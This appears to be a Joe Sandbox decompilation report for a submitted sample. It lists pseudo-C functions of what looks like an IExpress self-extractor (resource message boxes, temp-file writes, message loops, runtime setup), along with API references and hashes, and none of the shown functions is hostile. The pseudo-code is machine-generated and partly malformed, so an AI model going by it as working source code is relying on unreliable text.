                                                                                                                                                                                                        				int _t18;
                                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t20 = E00E8468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                        				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                        				if(_t21 != 0) {
                                                                                                                                                                                                        					if(E00E8468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                        						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                        							L7:
                                                                                                                                                                                                        							return LocalFree(_t21);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						_push(0x40);
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						_push(_t21);
                                                                                                                                                                                                        						_t18 = 0x3e9;
                                                                                                                                                                                                        						L6:
                                                                                                                                                                                                        						E00E844B9(0, _t18);
                                                                                                                                                                                                        						goto L7;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_push(0x10);
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_t18 = 0x4b1;
                                                                                                                                                                                                        					goto L6;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00E844B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        			}






                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00E8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E846A0
                                                                                                                                                                                                          • Part of subcall function 00E8468F: SizeofResource.KERNEL32(00000000,00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846A9
                                                                                                                                                                                                          • Part of subcall function 00E8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E846C3
                                                                                                                                                                                                          • Part of subcall function 00E8468F: LoadResource.KERNEL32(00000000,00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846CC
                                                                                                                                                                                                          • Part of subcall function 00E8468F: LockResource.KERNEL32(00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846D3
                                                                                                                                                                                                          • Part of subcall function 00E8468F: memcpy_s.MSVCRT ref: 00E846E5
                                                                                                                                                                                                          • Part of subcall function 00E8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,00E830B4), ref: 00E84189
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,00E830B4), ref: 00E841E7
                                                                                                                                                                                                          • Part of subcall function 00E844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E84518
                                                                                                                                                                                                          • Part of subcall function 00E844B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00E84554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$FINISHMSG
                                                                                                                                                                                                        • API String ID: 3507850446-3091758298
                                                                                                                                                                                                        • Opcode ID: 3204b47a9a50f35faddb5792e9145349f1c87c945ed4591ea1770c3009702647
                                                                                                                                                                                                        • Instruction ID: d742f27ada3d1d20fc6854aec994c67e60e9f73e15c5e0e97a6e70f4420cfb3e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3204b47a9a50f35faddb5792e9145349f1c87c945ed4591ea1770c3009702647
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A2018BF13412266BF32536664C8AF7B618EDBD4799F05502AB60DF11C09A68DC014365
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E00E819E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v520;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t11;
                                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        				void* _t33;
                                                                                                                                                                                                        				struct HWND__* _t34;
                                                                                                                                                                                                        				signed int _t35;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t33 = __edi;
                                                                                                                                                                                                        				_t27 = __ebx;
                                                                                                                                                                                                        				_t11 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                        				_t34 = _a4;
                                                                                                                                                                                                        				_t14 = _a8 - 0x110;
                                                                                                                                                                                                        				if(_t14 == 0) {
                                                                                                                                                                                                        					_t32 = GetDesktopWindow();
                                                                                                                                                                                                        					E00E843D0(_t34, _t15);
                                                                                                                                                                                                        					_v520 = 0;
                                                                                                                                                                                                        					LoadStringA( *0xe89a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                        					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                        					MessageBeep(0xffffffff);
                                                                                                                                                                                                        					goto L6;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					if(_t14 != 1) {
                                                                                                                                                                                                        						L4:
                                                                                                                                                                                                        						_t23 = 0;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t32 = _a12;
                                                                                                                                                                                                        						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                        							goto L4;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							EndDialog(_t34, _t32);
                                                                                                                                                                                                        							L6:
                                                                                                                                                                                                        							_t23 = 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00E86CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                        			}














                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EndDialog.USER32(?,?), ref: 00E81A18
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00E81A24
                                                                                                                                                                                                        • LoadStringA.USER32(?,?,00000200), ref: 00E81A4F
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00E81A62
                                                                                                                                                                                                        • MessageBeep.USER32(000000FF), ref: 00E81A6A
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1273765764-0
                                                                                                                                                                                                        • Opcode ID: b44438b0d52465a415a302fbb4e19c29031f13f5a168e1cffd75c1f85f996e2c
                                                                                                                                                                                                        • Instruction ID: 26e1240067bbcd7b9b1390b00e21b624b70bc9818fd6e11634cc42ec83997bff
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b44438b0d52465a415a302fbb4e19c29031f13f5a168e1cffd75c1f85f996e2c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1611E171601109AFEB04FF64DE4CAAE77B8EF09300F0081A1F91EB2190DB309E05CB92
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 88%
                                                                                                                                                                                                        			E00E863C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				long _v272;
                                                                                                                                                                                                        				void* _v276;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t15;
                                                                                                                                                                                                        				long _t28;
                                                                                                                                                                                                        				struct _OVERLAPPED* _t37;
                                                                                                                                                                                                        				void* _t39;
                                                                                                                                                                                                        				signed int _t40;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t15 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t15 ^ _t40;
                                                                                                                                                                                                        				_v272 = _v272 & 0x00000000;
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_v276 = _a16;
                                                                                                                                                                                                        				_t37 = 1;
                                                                                                                                                                                                        				E00E81781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                        				E00E8658A( &_v268, 0x104, _a12);
                                                                                                                                                                                                        				_t28 = 0;
                                                                                                                                                                                                        				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                                                                        				if(_t39 != 0xffffffff) {
                                                                                                                                                                                                        					_t28 = _a4;
                                                                                                                                                                                                        					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                                                                                                                                                        						 *0xe89124 = 0x80070052;
                                                                                                                                                                                                        						_t37 = 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					CloseHandle(_t39);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					 *0xe89124 = 0x80070052;
                                                                                                                                                                                                        					_t37 = 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00E86CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                                                                                                                                                        			}

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00E8642D
                                                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00E8645B
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00E8647A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00E863EB
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                        • API String ID: 1065093856-305352358
                                                                                                                                                                                                        • Opcode ID: 406c74e597355903999992efe962865c171d98f8588e462d6ee009e52eb96c38
                                                                                                                                                                                                        • Instruction ID: 80c60cc2f70cb24fe237ceb4d85363096ae50cfa8b0821f3bf167ddc644b3d74
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 406c74e597355903999992efe962865c171d98f8588e462d6ee009e52eb96c38
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6521C371A00218AFD710EF65DCC5FEB73A8EB45314F0041A9A59DB7180DAB05D898F64
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00E847E0(intOrPtr* __ecx) {
                                                                                                                                                                                                        				intOrPtr _t6;
                                                                                                                                                                                                        				intOrPtr _t9;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				void* _t19;
                                                                                                                                                                                                        				intOrPtr* _t22;
                                                                                                                                                                                                        				void _t24;
                                                                                                                                                                                                        				struct HWND__* _t25;
                                                                                                                                                                                                        				struct HWND__* _t26;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        				intOrPtr* _t28;
                                                                                                                                                                                                        				intOrPtr* _t33;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t33 = __ecx;
                                                                                                                                                                                                        				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                        				if(_t34 != 0) {
                                                                                                                                                                                                        					_t22 = _t33;
                                                                                                                                                                                                        					_t27 = _t22 + 1;
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						_t6 =  *_t22;
                                                                                                                                                                                                        						_t22 = _t22 + 1;
                                                                                                                                                                                                        					} while (_t6 != 0);
                                                                                                                                                                                                        					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                        					 *_t34 = _t24;
                                                                                                                                                                                                        					if(_t24 != 0) {
                                                                                                                                                                                                        						_t28 = _t33;
                                                                                                                                                                                                        						_t19 = _t28 + 1;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t9 =  *_t28;
                                                                                                                                                                                                        							_t28 = _t28 + 1;
                                                                                                                                                                                                        						} while (_t9 != 0);
                                                                                                                                                                                                        						E00E81680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                        						_t11 =  *0xe891e0; // 0x688290
                                                                                                                                                                                                        						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                        						 *0xe891e0 = _t34;
                                                                                                                                                                                                        						return 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t25 =  *0xe88584; // 0x0
                                                                                                                                                                                                        					E00E844B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                        					LocalFree(_t34);
                                                                                                                                                                                                        					L2:
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t26 =  *0xe88584; // 0x0
                                                                                                                                                                                                        				E00E844B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                        				goto L2;
                                                                                                                                                                                                        			}
















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00E84E6F), ref: 00E847EA
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00E84823
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00E84847
                                                                                                                                                                                                          • Part of subcall function 00E844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E84518
                                                                                                                                                                                                          • Part of subcall function 00E844B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00E84554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00E84851
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                        • API String ID: 359063898-305352358
                                                                                                                                                                                                        • Opcode ID: 71ddd0e7b0cefe78d4d583ee9afdb72124b887a460528fdf103690621a9cf3a4
                                                                                                                                                                                                        • Instruction ID: c4827cad9a2b3d7bb48b3cfc21d95a96419f4796d01857b161305ac91cf39757
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 71ddd0e7b0cefe78d4d583ee9afdb72124b887a460528fdf103690621a9cf3a4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 47115CF56046429FE718AF749C08F773759E781704B048419FD4EF7381DA358C0A8720
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00E83680(void* __ecx) {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				struct tagMSG _v36;
                                                                                                                                                                                                        				int _t8;
                                                                                                                                                                                                        				struct HWND__* _t16;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_v8 = __ecx;
                                                                                                                                                                                                        				_t16 = 0;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                        					if(_t8 == 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							if(_v36.message != 0x12) {
                                                                                                                                                                                                        								DispatchMessageA( &_v36);
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t16 = 1;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                        						} while (_t8 != 0);
                                                                                                                                                                                                        						if(_t16 == 0) {
                                                                                                                                                                                                        							continue;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					break;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t8;
                                                                                                                                                                                                        			}








                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00E8369F
                                                                                                                                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00E836B2
                                                                                                                                                                                                        • DispatchMessageA.USER32(?), ref: 00E836CB
                                                                                                                                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00E836DA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2776232527-0
                                                                                                                                                                                                        • Opcode ID: debf96b020eb8414283f2034e0ddc984f56e85c04d871b0cb1293f6dd7af280f
                                                                                                                                                                                                        • Instruction ID: 2ae549f5b2d2744889db4b6338881457e35d53200ea81f517e234d6e1525a4b5
                                                                                                                                                                                                        • Opcode Fuzzy Hash: debf96b020eb8414283f2034e0ddc984f56e85c04d871b0cb1293f6dd7af280f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D50184729012147BDB309AAB9C4CEEB767CEB85F10F14012ABA0DF2280E561C644D761
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 72%
                                                                                                                                                                                                        			E00E865E8(char* __ecx) {
                                                                                                                                                                                                        				char _t3;
                                                                                                                                                                                                        				char _t10;
                                                                                                                                                                                                        				char* _t12;
                                                                                                                                                                                                        				char* _t14;
                                                                                                                                                                                                        				char* _t15;
                                                                                                                                                                                                        				CHAR* _t16;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t12 = __ecx;
                                                                                                                                                                                                        				_t15 = __ecx;
                                                                                                                                                                                                        				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                        				_t10 = 0;
                                                                                                                                                                                                        				do {
                                                                                                                                                                                                        					_t3 =  *_t12;
                                                                                                                                                                                                        					_t12 =  &(_t12[1]);
                                                                                                                                                                                                        				} while (_t3 != 0);
                                                                                                                                                                                                        				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                        					if(_t16 <= _t15) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if( *_t16 == 0x5c) {
                                                                                                                                                                                                        						L7:
                                                                                                                                                                                                        						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                        							_t16 = CharNextA(_t16);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *_t16 = _t10;
                                                                                                                                                                                                        						_t10 = 1;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_push(_t16);
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                        					return _t10;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if( *_t16 == 0x5c) {
                                                                                                                                                                                                        					goto L7;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				goto L11;
                                                                                                                                                                                                        			}


                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00E82B33), ref: 00E86602
                                                                                                                                                                                                        • CharPrevA.USER32(?,00000000), ref: 00E86612
                                                                                                                                                                                                        • CharPrevA.USER32(?,00000000), ref: 00E86629
                                                                                                                                                                                                        • CharNextA.USER32(00000000), ref: 00E86635
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$Prev$Next
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3260447230-0
                                                                                                                                                                                                        • Opcode ID: 109af337d46429caabd4e01fe7af5c960ab82490a7d6e6aa57223f0c2ecb2837
                                                                                                                                                                                                        • Instruction ID: c24668e6eec0580a338deca16f1334456e1a8777b1dc6237bd256601c1ab140e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 109af337d46429caabd4e01fe7af5c960ab82490a7d6e6aa57223f0c2ecb2837
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 62F0F9710055906EE7322B298CCC8B7AF9CCF87258B1D01BFE49DB2011E6150D069761
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00E869B0() {
                                                                                                                                                                                                        				intOrPtr* _t4;
                                                                                                                                                                                                        				intOrPtr* _t5;
                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                        				intOrPtr _t11;
                                                                                                                                                                                                        				intOrPtr _t12;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				 *0xe881f8 = E00E86C70();
                                                                                                                                                                                                        				__set_app_type(E00E86FBE(2));
                                                                                                                                                                                                        				 *0xe888a4 =  *0xe888a4 | 0xffffffff;
                                                                                                                                                                                                        				 *0xe888a8 =  *0xe888a8 | 0xffffffff;
                                                                                                                                                                                                        				_t4 = __p__fmode();
                                                                                                                                                                                                        				_t11 =  *0xe88528; // 0x0
                                                                                                                                                                                                        				 *_t4 = _t11;
                                                                                                                                                                                                        				_t5 = __p__commode();
                                                                                                                                                                                                        				_t12 =  *0xe8851c; // 0x0
                                                                                                                                                                                                        				 *_t5 = _t12;
                                                                                                                                                                                                        				_t6 = E00E87000();
                                                                                                                                                                                                        				if( *0xe88000 == 0) {
                                                                                                                                                                                                        					__setusermatherr(E00E87000);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E00E871EF(_t6);
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}









                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00E86FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00E86FC5
                                                                                                                                                                                                        • __set_app_type.MSVCRT ref: 00E869C2
                                                                                                                                                                                                        • __p__fmode.MSVCRT ref: 00E869D8
                                                                                                                                                                                                        • __p__commode.MSVCRT ref: 00E869E6
                                                                                                                                                                                                        • __setusermatherr.MSVCRT ref: 00E86A07
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
• Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1632413811-0
                                                                                                                                                                                                        • Opcode ID: b037a2e2fadc47d2feb3a4e2a73228d687515a381be2bc99d3d1c40c825504e7
                                                                                                                                                                                                        • Instruction ID: 581e1256ed969b12592799f499262a8a61359e381ebe963994976aad4f45292b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b037a2e2fadc47d2feb3a4e2a73228d687515a381be2bc99d3d1c40c825504e7
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 16F09E74549301CFD7687B75BE0E6143BA1F704331B641619E86DB62F1CF3A85498B15
                                                                                                                                                                                                        Uniqueness

